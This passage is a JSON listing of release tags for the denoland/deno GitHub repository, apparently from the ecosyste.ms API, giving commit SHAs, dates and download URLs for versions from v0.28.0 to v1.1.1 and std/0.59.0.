dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://re